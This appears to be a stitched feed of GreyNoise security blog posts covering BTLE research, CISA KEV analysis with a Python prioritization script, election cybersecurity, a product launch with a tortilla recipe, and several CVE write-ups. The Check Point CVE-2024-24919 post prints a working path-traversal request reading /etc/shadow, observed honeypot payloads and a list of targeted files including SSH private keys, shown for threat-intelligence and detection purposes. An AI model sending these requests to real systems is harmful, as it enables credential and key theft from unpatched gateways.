  • Election Cybersecurity Landscape: The global election cybersecurity landscape is characterized by diverse targets, tactics, and threats, with state-sponsored actors posing the most serious cybersecurity risk to elections.
  • Hybrid Warfare: Election interference is often a key tactic of hybrid warfare campaigns, which seek to exacerbate internal divisions within a target state through tactics such as disinformation and cyberattacks.
  • Election Security Measures: Election officials should take steps to harden infrastructure against common attacks, utilize account security tools, and rehearse incident response plans to protect against cyber, physical, and operational security risks.
  • Countering Foreign Interference: Countering foreign interference in U.S. elections requires understanding how adversaries exploit fault lines within society and using strategies such as collecting open-source intelligence on social media and releasing public service announcements to warn about strategic threats.

  • Recent Influence Operations: Recent foreign influence operations have been identified, including those perpetrated by Russia, China, and Iran, which have been accused of conducting complex campaigns to manipulate U.S. politics.

BLUUID: Firewallas, Diabetics, And… Bluetooth

We're excited to share a groundbreaking new blog post from our Labs team that dives deep into the world of Bluetooth Low Energy (BTLE) device identification and vulnerability research. In "BLUUID: Firewallas, Diabetics, And... Bluetooth," our very own Remy explores the fascinating and often overlooked realm of BTLE security.

This comprehensive analysis covers everything from building a BTLE Generic Attribute (GATT) Universally Unique Identifiers (UUIDs) database to remotely identifying Bluetooth devices for vulnerability research. Remy doesn't just stop at theory – he demonstrates real-world implications by uncovering and responsibly disclosing vulnerabilities in Firewalla firewall products.

But why should you care about BTLE security? As Remy points out, the impact extends far beyond just privacy concerns. Recent incidents involving BTLE-enabled insulin pumps highlight the potential for physical harm when these systems are compromised or malfunction.

In this blog, you'll learn:

  • How to build a database of BTLE UUIDs for remote device identification
  • Techniques for extracting identifying attributes from Android APKs
  • Real-world application of these methods in vulnerability research
  • Insights into the current state of BTLE security in healthcare devices

Whether you're a cybersecurity professional, IoT enthusiast, or simply curious about the hidden world of Bluetooth, this blog post offers valuable insights and practical techniques you won't want to miss.

Ready to dive in? Head over to the GreyNoise Labs blog to read the full article and expand your understanding of BTLE security and its far-reaching implications.

Unveiling Vulnerability Insights from the CISA KEV Catalog at BSidesLV

Last week at BSidesLV, I had the privilege to explore the complexities of the CISA's Known Exploited Vulnerabilities (KEV) Catalog. This vital resource aids organizations in understanding which vulnerabilities are actively exploited and how to prioritize remediation efforts effectively. 

Here, I’ll share three key insights from my analysis that can enhance vulnerability management strategies.

The full talk (it's only 20 minutes, but I clearly could have used 30!) can be found here, and the slides and dataset used can be found here.

The Decreasing Age of CVEs Added to KEV

The average age of CVEs added to the KEV decreases over time. In 2023, which we consider the first full baseline year, most vulnerabilities were added within the first week of their assignment. This trend suggests not only are vulns being exploited faster (we know this) but also improved information sharing and partnerships between CISA and other organizations.

Additionally, the shift towards younger CVEs being added to KEV is encouraging as it indicates that the security community is becoming more proactive in identifying exploitation. For organizations, this means staying vigilant and ready to respond quickly to newly disclosed vulnerabilities, as they're more likely to be added to the KEV shortly after discovery.

The Fluidity of the "Known Ransomware Campaign Use" Field

A lesser-known aspect of the KEV data is that it's not static. 

In October 2023, CISA added a field called "known ransomware campaign use" to the catalog. We found that this field is updated silently and can change from "unknown" to "known" without fanfare. From October 2023 → July 2024, this field was updated 41 times.

Research suggests that vulnerabilities flagged for known ransomware use are patched 2.5 times faster; this makes sense given the significant financial and operational impacts of ransomware attacks. Organizations should pay close attention to this field and regularly check for updates. It goes without saying that if a vulnerability in your environment is flagged for known ransomware use, it should be prioritized for patching immediately.

Prioritization Insights from within the KEV Data

Another interesting finding is that by considering two data points from within the KEV, you can discern a “level of concern” that organizations can use to make more informed decisions about which vulnerabilities to address first when resources are limited.

1. The time that is given to fix the vulnerability.

Early on, the time to fix a vulnerability was either 14 or 180 days. Shortly after the Russia/Ukraine war, CISA seemed to adjust to a 21-day fixed period. However, if you look at the bottom right of the plot, you'll notice that there have been a handful of vulnerabilities with even shorter fix timelines in the last year.

2. The day of the week the vulnerability was added to the KEV.

Interestingly, the day of the week a vulnerability is added can be telling. In the past year+, there have only been two drops on a Friday, and both had a time to fix of 7 days (a time to fix of 7 days has only happened six more times). Overall, the time to fix has standardized to 21 days for most entries, but shorter timeframes indicate higher-priority vulnerabilities. 
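As an added example that is not part of the talk or its dataset, the following Python computes the two signals above (days given to fix, weekday added) from records laid out like CISA's KEV JSON feed, ranks entries with a "level of concern" heuristic that is this example's own choice rather than anything CISA publishes, and diffs the knownRansomwareCampaignUse field between two snapshots, which is how the silent updates described earlier would be noticed. The records are constructed placeholders, not real catalog entries.

```python
import json
from datetime import date

# Constructed sample snapshots in the shape of the KEV feed's "vulnerabilities"
# array (field names match the feed; CVE ids and dates are placeholders).
KEV_OLD = json.loads("""[
 {"cveID": "CVE-0000-0001", "vendorProject": "ExampleVendor", "product": "Gateway",
  "dateAdded": "2024-05-28", "dueDate": "2024-06-18",
  "knownRansomwareCampaignUse": "Unknown"},
 {"cveID": "CVE-0000-0002", "vendorProject": "ExampleVendor", "product": "Router",
  "dateAdded": "2024-05-31", "dueDate": "2024-06-07",
  "knownRansomwareCampaignUse": "Unknown"},
 {"cveID": "CVE-0000-0003", "vendorProject": "OtherVendor", "product": "Server",
  "dateAdded": "2022-01-10", "dueDate": "2022-07-09",
  "knownRansomwareCampaignUse": "Unknown"}
]""")

# A later snapshot: identical except the first entry's ransomware flag has
# silently flipped from Unknown to Known, the kind of change the talk describes.
KEV_NEW = json.loads(json.dumps(KEV_OLD))
KEV_NEW[0]["knownRansomwareCampaignUse"] = "Known"

USUAL_FIX_DAYS = 21  # the window most recent entries have settled on


def load_kev(path):
    """Load the real feed from disk; its JSON has a top-level 'vulnerabilities' array."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)["vulnerabilities"]


def days_to_fix(entry):
    """Signal 1: days between dateAdded and dueDate (the time given to fix)."""
    added = date.fromisoformat(entry["dateAdded"])
    due = date.fromisoformat(entry["dueDate"])
    return (due - added).days


def weekday_added(entry):
    """Signal 2: the weekday name on which the entry was added to the catalog."""
    return date.fromisoformat(entry["dateAdded"]).strftime("%A")


def level_of_concern(entry):
    """Heuristic score (this example's own tiers): a fix window shorter than
    the usual 21 days, a 7-day-or-less window, a Friday drop and a 'Known'
    ransomware flag each add to the score."""
    score = 0
    fix = days_to_fix(entry)
    if fix < USUAL_FIX_DAYS:
        score += 2
    if fix <= 7:
        score += 1
    if weekday_added(entry) == "Friday":
        score += 1
    if entry.get("knownRansomwareCampaignUse") == "Known":
        score += 2
    return score


def prioritize(entries):
    """Order entries by descending concern, then by earliest due date."""
    return sorted(entries, key=lambda e: (-level_of_concern(e), e["dueDate"]))


def ransomware_field_changes(old, new):
    """List (cveID, before, after) for entries whose ransomware flag changed
    between two snapshots; CISA updates this field without announcement."""
    before_by_id = {e["cveID"]: e.get("knownRansomwareCampaignUse") for e in old}
    changes = []
    for e in new:
        before = before_by_id.get(e["cveID"])
        after = e.get("knownRansomwareCampaignUse")
        if before is not None and before != after:
            changes.append((e["cveID"], before, after))
    return changes


if __name__ == "__main__":
    for e in prioritize(KEV_NEW):
        print(e["cveID"], days_to_fix(e), weekday_added(e), level_of_concern(e))
    print(ransomware_field_changes(KEV_OLD, KEV_NEW))
```

Running this daily against two consecutive downloads of the feed turns the silent flag changes into an explicit diff you can alert on.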

To summarize, although the KEV catalog is mainly intended for government use, it provides valuable insights for prioritizing vulnerabilities. Cybersecurity professionals can enhance their remediation efforts by analyzing patterns such as vendor dominance, time given to fix, the day of the week an issue was added, and any changes to the ransomware field.

Again, the full talk can be found here, and the slides and dataset can be found here.

The Tortilla Test: Ensuring Your Vulnerability Intelligence is Always Fresh

All of my friends (and my bathroom scale, honestly) will tell you that I love tortillas.  Not just any tortillas, however…they have to be homemade.  I make sure we have homemade tortillas every week and keep them in the fridge.  They are better than anything you can buy in a store, and they are simply amazing when they are hot off the comal.  My kids know this; when they see the comal on the stove, they make a point of hanging around the kitchen to snag one (often a few!) while they are fresh because they understand that freshness is everything for tortillas.

It turns out the same is true for vulnerability intelligence!

In just the first 6 months of 2024, we’ve seen over 2,000 remotely exploitable, no-authentication-necessary CVEs be published.  These are the kinds of vulnerabilities that are exploited on the Internet - via APTs and criminals or botnets driving mass exploitation - every minute of every day.  This is a huge amount to deal with, and what we’ve seen this year is that they are occurring more frequently on edge devices that don’t have many mitigating controls to protect them.  When these things happen, it forces security teams to drop what they are doing and scramble for a fix.

There are many existing vulnerability prioritization solutions that can help by including information like “Known Exploits Available” or “In the Wild”. The issue is that these attributes quickly become stale.  Technically, a snippet of proof-of-concept code is an available exploit, but it isn’t the same as a mass exploitation attack by a criminal organization.  A hard-to-exploit race condition that requires a lot of time and effort might be “In the Wild”, but that doesn’t require the same urgency to fix as something an actor is actively exploiting today.  In many ways, these attributes (in addition to CVSS Base Scores, Vendor bulletins, etc) are like stale tortillas - edible but ultimately unsatisfying.

At GreyNoise we believe that security teams deserve actionable information that is fresh enough to know what attackers are doing right now, so that they can respond with the speed and urgency required.  Consequently, today we’re launching GreyNoise for Vulnerability Prioritization to give our customers exactly that.

Here’s how it works:

We run a global network of thousands of sensors that emulate the types of assets enterprises have exposed to the Internet:  web servers, network gear, etc.  We see when attackers and bots start probing them, and we collect the data as they are attacked in real-time.  We compare this against known bad behaviors and known IPs; our ML models are even capable of alerting us to unknown but suspicious or malicious activities that are the hallmarks of novel exploits. This is all unique, primary data that we collect rather than simply aggregating from third-party sources.  In other words, we make fresh tortillas from scratch rather than just reselling ones we bought from a supermarket.

As we collect this information, we make it immediately available via our Visualizer for ad-hoc usage and through our API for inclusion in your existing automation.  We ensure that information is always fresh, so that you can get the most up-to-date intel for as long as you need until you fix the problem.

There are many good vulnerability prioritization tools out there, but we believe that only we can tell vulnerability teams which CVEs need attention now based on what attacks are actually happening today.  Because Vuln Intel is based on all the same data that powers GreyNoise, you’ll also be able to share what you know seamlessly with your SOC analysts and threat hunters.

We think you’ll enjoy having fresh and actionable information with Greynoise Vulnerability Prioritization.  You can visit our website to learn more or schedule time to talk with us directly. 

I know you’ll also love having fresh and delicious tortillas, so please enjoy this recipe.  I look forward to hearing from you about both!

Flour Tortillas Recipe

Ingredients:

  • 4 parts all-purpose flour
  • 0.1 part salt
  • 1 part lard (or shortening, but lard is the best)
  • 2 parts water - hot water for thin and chewy tortillas, cold water for thick and fluffy

For example, I find 300gm (4 x 75gm) flour + 75gm lard (1 x 75gm) + 8gm salt (.1 x 75gm) mixed with 150gm (2 x 75gm) hot water makes 8 burrito-sized or 12 fajita-sized tortillas.

Instructions:

  • Place flour, salt, and lard in a bowl.  Add in water; if using hot water, give it 30 seconds to melt the lard.
  • Knead for 1 minute - it should be tacky but not so sticky it won't easily come off your fingers; you can add a little flour if needed.
  • Let stand covered for 30 minutes.
  • Heat a cast iron griddle (a skillet works too) on med-high for 5 minutes (i.e. at the 25-minute mark)
  • Divide the dough into golf ball-sized portions.
  • Using a rolling pin, roll one into 6-9 inch diameter rounds.
  • Cook 30 seconds on one side - you'll see bubbles form on the top when it is time to flip.  Now is a great time to roll the next round while it cooks.
  • Flip and cook for another 15-30 seconds; I like longer to get a few charred spots.
  • Stack on a plate and cover with a towel.

Eat them soon — they will be unbelievably good for 60 minutes, very good the rest of the day, and better than anything you can buy in the store for at least a week if you keep them in the fridge. 

Understanding the Election Cybersecurity Landscape

As we edge closer to the 2024 U.S. elections, the cybersecurity landscape surrounding this crucial event is more complex and dynamic than ever. The sheer variety of targets, tactics, and threats highlights the immense challenge of securing our democratic process. From state-sponsored entities to cybercriminals and hacktivists, a multitude of actors are ready to exploit any vulnerabilities they can find. Understanding this broad landscape is essential for grasping the challenges we face and appreciating the efforts required to safeguard our elections.

To help reduce any confusion, and provide some solid guidance, we’ve put together a multipart series that we’ll be releasing over the coming weeks. The goal is to help folks understand what’s truly at-risk, along with helpful things you can do to join in the efforts to maintain and increase the cyber safety and resilience of America’s elections. We’re starting, today, with an overview of who and what is truly at risk, along with a high-level review of the adversaries and tactics in play. Over the remaining series, we’ll tackle:

  • the role of state-sponsored actors in election interference
  • phishing and social engineering
  • the threat of deepfakes and disinformation campaigns

Let’s dive in!

The Targets

When we think about election security, our minds often jump to voting machines and voter registries. While these are certainly critical, the attack surface extends far beyond them. Political campaigns, for instance, rely heavily on digital infrastructure, including websites, email systems, and databases. These elements are prime targets for cyber intrusions and disinformation campaigns designed to disrupt operations and erode public trust. Political parties, too, are vulnerable, with adversaries seeking to steal sensitive information or create chaos within their ranks.

News and social media platforms also play a crucial role in the election process. Unfortunately, they are frequently exploited to spread disinformation and sow discord among voters. Manipulating these platforms can have far-reaching consequences, influencing public opinion and undermining the democratic process. Election management systems, responsible for counting, auditing, and reporting results, are also critical targets. Ensuring the integrity of these systems is paramount to maintaining the credibility of the electoral outcome.

The Tactics

The tactics employed by threat actors are as diverse as the targets they pursue. Traditional cyber intrusions, such as phishing and spear phishing, remain prevalent, allowing adversaries to gain unauthorized access to sensitive systems and data. Distributed denial of service (DDoS) attacks aim to disrupt the availability of critical election-related websites and services, potentially causing widespread confusion and delays. Ransomware, which involves encrypting critical data and demanding payment for its release, poses a significant threat to election infrastructure, with the potential to cripple essential operations.

While most voting machines are not directly connected to the internet, they are still vulnerable to internet-based attacks through indirect means. For example, voting machines must accept electronic input files from other computers, such as ballot definition files prepared on Election Management System (EMS) computers. If these EMS computers are compromised, they can introduce fraudulent data or malicious code into the voting machines. This indirect connection to the internet creates a potential attack vector that sophisticated adversaries could exploit.

Recently, the rise of deepfakes and disinformation has added a new layer of complexity to the cybersecurity landscape. The use of AI-generated content to mislead voters and manipulate public opinion has become increasingly sophisticated, making it harder to discern truth from falsehood. These tactics are not only disruptive, but also corrosive, eroding trust in the electoral process and the institutions that support it.

The Actors

The actors behind these threats are varied, each with distinct motivations and capabilities. State-sponsored actors, including nations such as Russia, China, Iran, and North Korea, have been identified as significant threats. These entities aim to undermine U.S. elections to destabilize the country and influence its policies. Their sophisticated operations often involve a combination of cyber intrusions, disinformation campaigns, and other tactics designed to achieve strategic objectives.

Cybercriminals, on the other hand, are typically motivated by financial gain. They may deploy ransomware or sell stolen data on the “dark web”, exploiting vulnerabilities for profit. Hacktivists, driven by ideological beliefs, seek to promote their political agendas by disrupting election processes or exposing perceived injustices. While their methods may differ, the impact of their actions can be equally damaging.

The Importance of Vigilance

Understanding the broad landscape of election cybersecurity threats plays a significant role in helping us grasp the complexity and scope of the challenges faced. This knowledge helps the public appreciate the efforts required to secure elections and underscores the importance of vigilance and proactive measures. 

As we approach the 2024 elections, enhanced security measures, such as implementing multifactor authentication and conducting regular vulnerability assessments, are vital. Public awareness and education about common disinformation tactics can help mitigate the impact of false information. At the same time, collaboration and information sharing between federal, state, and local agencies, as well as private sector partners, are essential for a coordinated response to emerging threats.

By comprehending and addressing the diverse array of threats, tactics, and actors in the election cybersecurity landscape, we can better protect the integrity of our democratic processes and ensure that every vote counts.

Perma-Vuln: D-Link DIR-859, CVE-2024-0769

Discover the latest findings from GreyNoise Labs as we delve into a perma-vuln plaguing the D-Link DIR-859 router. In our newest blog post, "Perma-Vuln: D-Link DIR-859, CVE-2024-0769," we uncover the intricacies of CVE-2024-0769, a path traversal vulnerability affecting D-Link DIR-859 WiFi routers, leading to information disclosure.

The exploit's variations, including one observed in the wild by GreyNoise, enable the extraction of account details from the device. The product is End-of-Life, so it won't be patched, posing long-term exploitation risks. Multiple XML files can be invoked using the vulnerability.

Click here to see the details and interesting payload that Sift has identified.

SolarWinds Serv-U (CVE-2024-28995) exploitation: We see you!

On June 5, 2024, SolarWinds published an advisory detailing CVE-2024-28995 - a path-traversal vulnerability in Serv-U, discovered by Hussein Daher. Our Labs team - with our brand new deception engineer - seized this opportunity to deploy a new honeypot they've been working on. It's supposed to look more real - and vulnerable! - than past honeypots.

What did they discover?

They show off all kinds of information gleaned from their honeypot - who's attacking it, what files they're trying to steal, how often they come back, and more.

But, that's not all!

They actually managed to capture a live attacker making several copy/paste mistakes, and attempting to correct the exploit only to foul it up again! They track the attacker's progress over the course of 4 hours, including one instance where they sent the completely wrong exploit (which happens to be for an unpatched vulnerability!).

Check out the full blog on GreyNoise Labs to learn more about this vulnerability and our observations.

What's Going on with CVE-2024-4577 (Critical RCE in PHP)?

Check out the latest from GreyNoise Labs as we examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, this vulnerability exploits a 'best-fit' Unicode processing behavior in Windows. This allows attackers to inject command-line arguments via HTTP requests.

Detailed examples of payloads observed in the wild to achieve remote code execution are included, showcasing how attackers exploit the vulnerability in the real world. These payloads range from simple PHP code snippets to more complex scripts that download and execute malicious binaries.

Check out the detailed post here for a deeper dive into the technical details and the full range of payloads.

What’s Going on With Check Point (CVE-2024-24919)?

On May 28, 2024, Check Point published an advisory (and emailed customers) regarding CVE-2024-24919, a CVSS 8.6 vulnerability that they described using fairly vague language: "exploiting this vulnerability can result in accessing sensitive information on the Security Gateway. This, in certain scenarios, can potentially lead the attacker to move laterally and gain domain admin privileges."

Although they buried the lede a bit, if you scroll way down and click through a bit, you'll see that attacks in the wild occurred as far back as April 7, 2024 (nearly 2 months)! Two days after the advisory came out (May 30, 2024), we published a tag, which currently shows rapidly increasing exploitation:

Although you can’t see it on the graph, the very first attempts we saw were on May 31, 2024 at around 9:30am UTC. We also observed some attempted exploits on May 30, 2024, but they don’t show up in our public data because they don’t actually work (more on that below).

On the same day (May 30, 2024), watchTowr labs published an amazing write-up that includes a working proof of concept. On that same day, CISA added it to the Known Exploited Vulnerabilities list.

On May 31, 2024, our friends at Censys published their write-up, which indicated that there are nearly 14,000 devices running some version of that software, although it’s not clear how many of those have exposed management ports.

The vulnerability

The core vulnerability is a pretty straightforward path traversal issue. One of the folks on my team reverse engineered the patch concurrently with watchTowr and came up with basically the same exploit (this one is from watchTowr):

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Since the server runs as root, an attacker can grab any file on the filesystem! We’ll show you what attackers are actually searching for below.

Our observations

Sift

Although we tagged this issue very quickly, we actually saw the first exploit attempt (emphasis on attempt, since the payload doesn't work) hitting Sift on May 30, 2024 - presumably somebody thought they’d figured it out and pushed the big “go” button a bit too quickly:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)

/clients/MyCRL/../../../..//etc/shadow

We started seeing actual exploitation attempts logged in Sift on May 31, 2024:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Connection: close
Accept-Encoding: gzip
Connection: close
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

aCSHELL/../../../../../../../etc/shadow

I’m always impressed when an automated system can catch a novel exploit without being told about it!

Honeypot data

We manually searched our honeypot data going back 90 days prior to today (June 4, 2024), and the oldest exploit attempts that we see started on May 30, 2024, at about 5pm UTC:

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38

/clients/MyCRL/../../../..//etc/passwd

The word “attempts” is doing a lot of work in that sentence because, from what we can tell, this payload doesn’t actually work - perhaps somebody pressed the big red button before actually testing their exploit?

In any case, the IP address using that broken payload was 125.229.221.55, a Taiwan-based address that started scanning for HNAP-enabled devices on May 30, 2024, then a few hours later (on the same day) started scanning for CVE-2024-24919. We can’t say with certainty whether the HNAP scan is related, but it’s the only other traffic we’ve ever seen from that IP address. In the exploits, the IP attempted to fetch /etc/passwd and /etc/shadow.

The first real exploitation we observed began on the morning of May 31, around 9:40am UTC, when a New York-based IP address, 45.88.91.78, took a break from searching for Cisco ASA appliances and started launching exploits for this issue with a payload that would appear to actually work (and, in fact, is suspiciously identical to watchTowr’s PoC, including the number of ../s):

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:82.0) Gecko/20100101 Firefox/82.0
Connection: close
Content-Length: 39
Accept-Encoding: gzip

aCSHELL/../../../../../../../etc/shadow

Around that same time, a chorus of different scanners emerged that used a bunch of different paths. Due to the nature of the vulnerability, it’s very hard to determine the actual intent of the attacker - all we know is which file they’re trying to fetch. Whether they’re using that to steal passwords or to test the vulnerability is hard to know.

That being said, as of June 4, 2024, here is the top-10 list of plausibly-working payloads that we’ve observed, with the counts:

4805 ../../../../../../../etc/fstab
2453 ../../../../../../../etc/shadow
980 ../../../../../../../sysimg/CPwrapper/SU/Products.conf
959 ../../../../../../../config/db/initial
508 ../../../../../../../etc/passwd
202 ../../../../../../../home/*/.ssh/authorized_keys
166 ../../../../../../../opt/checkpoint/conf/
165 ../../../../../../../etc/ssh/sshd_config
163 ../../../../../../../etc/vpn/vpn.conf
161 ../../../../../../../home/*/.ssh/id_rsa

It’s interesting to contrast that with this list, which we generated yesterday (June 3, 2024):

1615 ../../../../../../../etc/fstab
491 ../../../../../../../etc/passwd
486 ../../../../../../../etc/shadow
197 ../../../../../../../home/*/.ssh/authorized_keys
161 ../../../../../../../opt/checkpoint/conf/
160 ../../../../../../../etc/ssh/sshd_config
158 ../../../../../../../etc/vpn/vpn.conf
156 ../../../../../../../home/*/.ssh/id_rsa
94 ../../../../../../../home/*/.ssh/known_hosts
83 ../../../../../../../home/root/.ssh/authorized_keys

As you can see, /etc/fstab remains a popular target - probably it’s a reliable path being used by some off-the-shelf scanner(s).

/etc/shadow of course remains popular, but we’re suddenly seeing a lot of attempts to pull /sysimg/CPwrapper/SU/Products.conf and /config/db/initial that we weren’t seeing yesterday. That demonstrates how the attack is evolving day over day!
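As an added example (not Sift or any other GreyNoise code), here is a small Python parser that flags POST requests to /clients/MyCRL carrying ../ traversal in the body, records the requested file and the traversal depth, and tallies targets the way the lists above do. The sample requests are constructed from the captures on this page, and the "any ../ in the body" rule is our own heuristic, not something taken from the Check Point advisory.

```python
"""Tally CVE-2024-24919 path-traversal attempts in raw HTTP requests.
Added example, not GreyNoise's Sift code; the request shapes are constructed
from the captures on this page."""
import re
from collections import Counter

TRAVERSAL = re.compile(r"(\.\./)+")   # one or more ../ segments

def parse_request(raw):
    """Split a raw HTTP request into (method, path, body)."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    parts = head.splitlines()[0].split()
    return parts[0], parts[1], body.strip()

def classify(raw):
    """Return a finding for a CVE-2024-24919-shaped request, else None.

    Heuristic (our assumption, not from the advisory): a POST to /clients/MyCRL
    whose body contains ../ counts as an attempt. 'depth' is the number of ../
    segments, so it can be compared with the seven used by the public PoC.
    """
    method, path, body = parse_request(raw)
    if method != "POST" or path != "/clients/MyCRL":
        return None
    m = TRAVERSAL.search(body)
    if not m:
        return None
    return {"prefix": body[:m.start()],            # e.g. "aCSHELL/"
            "depth": m.group(0).count("../"),
            "target": "/" + body[m.end():].lstrip("/")}

def tally(requests):
    """Count targeted files across requests, like the top-10 lists above."""
    return Counter(f["target"] for f in map(classify, requests) if f)

def make_request(path, body, method="POST"):
    """Build a raw request in the shape of the captures above (constructed)."""
    return (f"{method} {path} HTTP/1.1\r\nHost: <IP_ADDRESS>\r\nConnection: close\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")

SAMPLE_REQUESTS = [                                   # constructed sample traffic
    make_request("/clients/MyCRL", "aCSHELL/../../../../../../../etc/shadow"),
    make_request("/clients/MyCRL", "/clients/MyCRL/../../../..//etc/shadow"),
    make_request("/clients/MyCRL", "aCSHELL/../../../../../../../etc/fstab"),
    make_request("/", "", method="GET"),              # unrelated, ignored
]
```

Running tally(SAMPLE_REQUESTS) over the constructed traffic yields /etc/shadow twice and /etc/fstab once, with the May 30 shape reported at depth 4 and the PoC shape at depth 7.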

Unfortunately, we didn’t directly observe the 0-day exploitation prior to the advisory being released; presumably, the attacks were targeted and didn’t hit our sensor network (although as we expand our new sensors and personas to real networks, we expect to start seeing this type of 0-day exploitation in Sift!)

Conclusion

With a public proof of concept out, and exploitation quickly ramping up, we recommend patching Check Point as soon as possible!

Cybersecurity in the Age of AI: What Experts are Saying

The cybersecurity market is undergoing a noticeable shift with the integration of AI, transitioning from using AI as a replacement for Googling to leveraging its advanced capabilities in pattern recognition and anomaly detection. Currently, there are many questions about what AI can truly achieve today and what the future holds. To address this, we assembled a panel of seasoned security professionals for an open discussion on the real potential of AI in cybersecurity and what is merely adding to the noise.

On Thursday, May 30th, GreyNoise is hosting a live webinar “AI for Cybersecurity: Sifting the Noise.” To give you a taste of what’s to come, we have asked each of our presenters a key question touching on one of the many topics we will explore in the discussion. Let’s dig into their answers below:

Bob Rudis, VP of Data Science and Research

Q: What do you think is currently the biggest lie about AI?

A: The biggest misconception is that AI (particularly LLMs/GPTs) is seen as more than just a tool. Unlike traditional machine learning or a dictionary/thesaurus, these AI systems are marketed as intelligent actors or companions. However, they are simply tools that excel at understanding human input and generating responses based on vast amounts of data. Their perceived intelligence comes from their ability to produce useful outputs by recognizing patterns in data, not from any inherent understanding or consciousness.

Daniel Grant, Principal Data Scientist

Q: What AI advancement in the past few years are you most excited about?

A: The most obvious advancement is the development of highly capable LLMs. Just a few years ago, getting GPT-2 to produce coherent text was a challenge. Now, we have 70-billion parameter models that can run on laptops and chatbots that can pass the Turing test at your local Toyota dealership. Another exciting advancement is the improved quality of vector databases, which allow for direct, real-time access to entire datasets, reducing the need for compact machine learning models.

Ron Bowes, Security Researcher

Q: What's the most surprising thing an AI you've used has surfaced?

A: At GreyNoise, we developed a tool called Sift, which runs traffic seen by honeypots through magic machine-learning algorithms to help us (and customers!) see what attackers are up to each day.

One exploit that stood out to me a couple months ago was an attempt to exploit F5 BIG-IP that I wrote about on our Labs Grimoire blog. I'd recently spent time tidying up our F5 BIG-IP rules, since there's a lot of overlap between the various vulnerabilities and exploits (that is, several different vulnerabilities use very similar-looking exploits, and some of our older tags were mixing them up). One of the vulnerabilities I ran into was an exploit for CVE-2022-1388 (auth bypass), chained with CVE-2022-41800 (authenticated code execution, which I initially discovered and reported).

What was particularly interesting about that one is that they used the proof of concept (PoC) from the original CVE-2022-41800 disclosure, which I had designed to look super obvious, instead of using the actual exploit we also released. Not only that, but because CVE-2022-41800 is an *authenticated* RCE, they combined my PoC with a separate authentication-bypass vulnerability (CVE-2022-1388), which already had an RCE exploit that didn't require a secondary vulnerability. So, not only did they use the super obvious PoC, its usage was entirely unnecessary as well!

Presumably, the point of using this unusual combination was to avoid detection, but instead they just stood out more!

---

If these insights pique your interest, join us on Thursday for the live event where you can ask your own questions to our expert panel.

Honeypots Are Back: The Movie: The Blog

GreyNoise was founded to see what others don’t. That quest led us to build a unique global network of thousands of sensors across hundreds of strategically selected points of presence, giving cybersecurity practitioners unparalleled insight into online activity, whether malicious or benign. 

And in 2023, we saw something new.

In the second quarter of 2023, GreyNoise researchers observed a substantial change in internet scanning behavior. Malicious inventory scans dropped significantly in frequency and scale, and the vast majority of these types of scans now come from benign sources. This, along with the speed at which compromises follow vulnerability announcements, strongly suggests more capable attacker groups have implemented their own form of “attack surface monitoring” to avoid tripping existing defenses. Attackers are now less likely to risk their reconnaissance infrastructure being detected and flagged prior to establishing confidence in a successful attack path.

A change in attacker behavior is rendering current defenses less effective. But an established technique is ready to rise to the challenge. Honeypots are back.

With attackers routing around observation and detection, traditional third-party threat intelligence cannot provide the targeted attack visibility that defenders need. A first-party, honeypot-based approach is ready to step into the breach.

While honeypot programs have traditionally struggled with deployment, operation, and data analysis, new technology is changing the game. Advances in infrastructure automation, network traffic shaping, cloud computing, and artificial intelligence make it possible to consistently identify novel attacks and reveal attacker infrastructure. New honeypot networks are easy to deploy, with flexible impersonation, believable personas, and automated analysis. Whether on an organization’s perimeter or deployed across the globe, they provide the insights defenders need to protect key systems before a breach. 

At GreyNoise, we haven’t just focused on tech leadership — we’ve brought in thought leadership as well. In order to educate the market about these new challenges, and how honeypots can help tackle them, our deception and intelligence experts Andrew Morris and Bob Rudis have published the Honeypots Are Back report. This report:

  • Breaks down targeted attacks
  • Compares third- and first-person threat intelligence
  • Discusses traditional honeypot challenges
  • Establishes a new honeypot maturity framework
  • Provides a security checklist for defenders to implement this necessary capability

To dive deeper into each of these topics, read the report here. To see a demonstration of the new honeypot capabilities under development at GreyNoise today, watch our on-demand honeypot webinar here. And if you’re ready to discuss standing up a mature honeypot network in your own environment, talk to our team.
